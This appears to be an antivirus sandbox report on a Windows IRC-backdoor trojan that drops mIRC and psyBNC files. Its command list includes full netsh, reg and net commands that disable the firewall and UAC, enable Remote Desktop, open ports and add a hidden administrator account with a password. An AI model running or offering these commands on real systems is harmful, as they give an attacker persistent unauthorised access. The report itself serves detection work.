Technical Information
To ensure autorun and distribution
Modifies the following registry keys
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] '' = '%windir%\temp\system\init.exe'
Creates the following services
- [<HKLM>\System\CurrentControlSet\Services\IKEEXT] 'Start' = '00000002'
Malicious functions
To bypass firewall, removes or modifies the following registry keys
- [<HKLM>\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile] 'EnableFirewall' = '00000000'
- [<HKLM>\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile] 'EnableFirewall' = '00000000'
To complicate detection of its presence in the operating system,
blocks the following features:
- User Account Control (UAC)
Executes the following
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name=RDP protocol=TCP dir=in localport=3389 action=allow
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name=Elite protocol=TCP dir=in localport=31337 action=allow
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name=Identd protocol=TCP dir=in localport=113 action=allow
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name=mIRC protocol=TCP dir=out localport=6697 action=allow
Modifies file system
Creates the following files
- %WINDIR%\temp\mirc.ini
- %WINDIR%\temp\mirc293228.tm_
- %WINDIR%\temp\mirc29600.tm_
- %WINDIR%\temp\mirc188250.tm_
- %WINDIR%\temp\mirc521383.tm_
- %WINDIR%\temp\mirc688491.tm_
- %WINDIR%\temp\logs\status.log
- %TEMP%\7zsfx000.cmd
- %PROGRAMDATA%\microsoft\windows\start menu\programs\startup\init.lnk
- %WINDIR%\temp\system\winlogon.exe
- %WINDIR%\temp\system\svchost.exe
- %WINDIR%\temp\system\script\script3.dll
- %WINDIR%\temp\system\script\psybnc\psybnc.dll
- %WINDIR%\temp\system\msvcr100d.dll
- %WINDIR%\temp\system\msvcp100d.dll
- %WINDIR%\temp\system\init.exe
- %WINDIR%\temp\mirc.exe
- %WINDIR%\temp\system\script\vars.ini
- %WINDIR%\temp\system\script\psybnc\psybnc.bhelp.en
- %WINDIR%\temp\system\script\psybnc\logs\main.log
- %WINDIR%\temp\system\script\ports.txt
- %WINDIR%\temp\system\info.bat
- %WINDIR%\temp\s.reg
- %WINDIR%\temp\psybnc.ico
- %WINDIR%\temp\mirc170523.tm_
- %WINDIR%\temp\mirc830136.tm_
Deletes the following files
- %TEMP%\7zsfx000.cmd
Moves the following files
- from %WINDIR%\temp\mirc688491.tm_ to %WINDIR%\temp\mirc.ini
- from %WINDIR%\temp\mirc521383.tm_ to %WINDIR%\temp\system\script\vars.ini
- from %WINDIR%\temp\mirc29600.tm_ to %WINDIR%\temp\servers.ini
- from %WINDIR%\temp\mirc293228.tm_ to %WINDIR%\temp\servers.ini
- from %WINDIR%\temp\mirc170523.tm_ to %WINDIR%\temp\servers.ini
- from %WINDIR%\temp\mirc830136.tm_ to %WINDIR%\temp\mirc.ini
Deletes itself.
Network activity
TCP
HTTP GET requests
- http://ip##fo.io/95.211.190.199
UDP
- DNS ASK ir###.iownyour.biz
- DNS ASK 19#.###.211.95.in-addr.arpa
- DNS ASK ip##fo.io
Miscellaneous
Searches for the following windows
- ClassName: 'RegEdit_RegEdit' WindowName: ''
- ClassName: 'NDDEAgnt' WindowName: 'NetDDE Agent'
Creates and executes the following
- '%WINDIR%\temp\system\init.exe'
- '%WINDIR%\temp\mirc.exe'
- '%WINDIR%\temp\system\svchost.exe'
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\7ZSfx000.cmd" "' (with hidden window)
Executes the following
- '%WINDIR%\syswow64\cmd.exe' /c START /WAIT /B regedit /s %windir%\temp\s.reg & START /B %windir%\temp\mirc.exe & START /MIN reg ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWOR...
- '%WINDIR%\syswow64\regedit.exe' /s %WINDIR%\temp\s.reg
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
- '%WINDIR%\syswow64\netsh.exe' advfirewall set allprofiles state off
- '%WINDIR%\syswow64\reg.exe' add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
- '%WINDIR%\syswow64\net.exe' user ASP.NET W33dz123!@#$ /ADD
- '%WINDIR%\syswow64\net.exe' user ASP.NET W33dz123!@#$
- '%WINDIR%\syswow64\net.exe' localgroup Administrators ASP.NET /ADD
- '%WINDIR%\syswow64\net.exe' localgroup "Remote Desktop Users" ASP.NET /ADD
- '%WINDIR%\syswow64\net1.exe' localgroup "Remote Desktop Users" ASP.NET /ADD
- '%WINDIR%\syswow64\net1.exe' user ASP.NET W33dz123!@#$
- '%WINDIR%\syswow64\net1.exe' user ASP.NET W33dz123!@#$ /ADD
- '%WINDIR%\syswow64\net1.exe' localgroup Administrators ASP.NET /ADD
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\7ZSfx000.cmd" "
- '<SYSTEM32>\rundll32.exe' <SYSTEM32>\FirewallControlPanel.dll,ShowNotificationDialog /configure /ETOnly 0 /OnProfiles 6 /OtherAllowed 0 /OtherBlocked 0 /OtherEdgeAllowed 0 /NewBlocked 2 "%WINDIR%\temp\mirc.exe"
